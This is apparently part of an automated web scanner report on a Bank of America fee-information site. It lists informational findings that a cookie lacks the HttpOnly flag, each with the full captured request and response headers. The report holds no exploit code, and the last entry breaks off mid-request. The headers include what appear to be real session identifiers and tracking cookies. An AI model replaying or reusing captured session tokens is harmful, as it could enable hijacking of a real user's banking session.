Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c29f-3ea-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 1002
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:02 GMT
Content-Type: image/png
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

.PNG
.
...IHDR...6.................IDATH..._L[U......v.+.:K...s....d.Ac....?..c...[H| .|.. .$..3......{......^f.K$*B)I..@];...i.........e...o~...s~.....n.....eY.E8...AQ.D4..sn..$....t:.....|>...*).
...[SNIP]...

4.50. http://factsaboutfees.bankofamerica.com/assets/img/volume_control/video_on.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/volume_control/video_on.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/volume_control/video_on.png HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:02 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c2a4-3de-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 990
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:02 GMT
Content-Type: image/png
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

.PNG
.
...IHDR...6.................IDATH..U]h[e.~..gI......s..mslZ..*X.........M..+q..".XrS.`NX..e..7.,.N. [...D.4..........=...~..g............~..s.......$I. ......,#.a...J."J..(..(..e.....iQ......
...[SNIP]...

4.51. http://factsaboutfees.bankofamerica.com/assets/js/app.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/js/app.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/js/app.js HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:12:59 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c1c2-8888-4ab460c951580"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 34952
Content-Type: application/x-javascript
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

var timeout = 1000;
var closetimer = 0;
var ddmenuitem = 0;
var cache = {};
var assetpath = "http://webmedia.bankofamerica.com/factsaboutfees/11505-JanMaint/assets";

$().ready(function() {

...[SNIP]...

4.52. http://factsaboutfees.bankofamerica.com/assets/js/jquery-1.3.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/js/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/js/jquery-1.3.2.min.js HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:12:59 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c1c1-dfa6-4ab460c951580"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 57254
Content-Type: application/x-javascript
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

4.53. http://factsaboutfees.bankofamerica.com/assets/js/jquery-ui-1.7.2.custom.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/js/jquery-ui-1.7.2.custom.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/js/jquery-ui-1.7.2.custom.min.js HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:12:59 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1bf-43f6-4ab460cb39a00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 17398
Content-Type: application/x-javascript
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

/*
* jQuery UI 1.7.2
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.
...[SNIP]...

4.54. http://factsaboutfees.bankofamerica.com/assets/js/oo_engine.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/js/oo_engine.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:00 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/js/oo_engine.js HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:00 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:58 GMT
ETag: "24c1c0-1ae6-4ab460cd21e80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 6886
Content-Type: application/x-javascript
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:00 GMT;path=/

/* OnlineOpinion (F3cS v3.1) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var custom_var,O_tmof
...[SNIP]...

4.55. http://factsaboutfees.bankofamerica.com/assets/js/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/js/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/js/swfobject.js HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
